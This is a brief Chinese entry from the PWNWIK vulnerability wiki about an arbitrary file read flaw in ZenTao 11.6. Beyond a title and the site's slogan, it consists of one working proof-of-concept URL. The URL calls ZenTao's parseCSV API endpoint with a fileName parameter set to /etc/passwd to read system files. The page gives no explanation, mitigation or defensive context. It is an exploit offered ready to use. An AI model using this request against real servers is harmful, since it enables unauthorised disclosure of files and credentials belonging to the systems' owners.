Loading
0

禅道 11.6 任意文件读取漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

POC

http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd 

免费、自由、人人可编辑的漏洞库